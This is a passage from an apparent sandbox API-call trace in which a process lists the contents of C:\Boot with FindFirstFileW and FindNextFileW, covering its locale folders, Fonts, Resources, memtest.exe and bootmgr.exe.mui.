nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0156.317] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789aa98c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789aa98c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789aa98c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.318] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-MX", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789d0a50, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-CA", cAlternateFileName="")) returned 1 [0156.319] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0156.320] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0156.320] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0156.320] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0156.320] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0156.321] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0156.321] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0156.321] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0156.321] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc2960, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0156.321] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0156.321] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a1cf69, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a1cf69, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a1cf69, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="qps-ploc", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78b27f82, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0156.322] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a4324e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a4324e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a4324e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a693cf, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a693cf, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uk-UA", cAlternateFileName="")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a693cf, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78a8f7b9, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78a8f7b9, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0156.323] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78a8f7b9, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0156.324] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0156.324] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x78ab5a49, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78ab5a49, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0156.324] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.324] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*", lpFindFileData=0x1aeeac | out: lpFindFileData=0x1aeeac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.324] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.324] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.325] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.325] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0156.325] FindFirstFileW (in: lpFileName="C:\\Boot\\bg-BG\\*.*", lpFindFileData=0x1aeeec | out: lpFindFileData=0x1aeeec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0156.325] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x7898476d, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.325] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x7898476d, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.325] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef00 | out: lpFindFileData=0x1aef00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 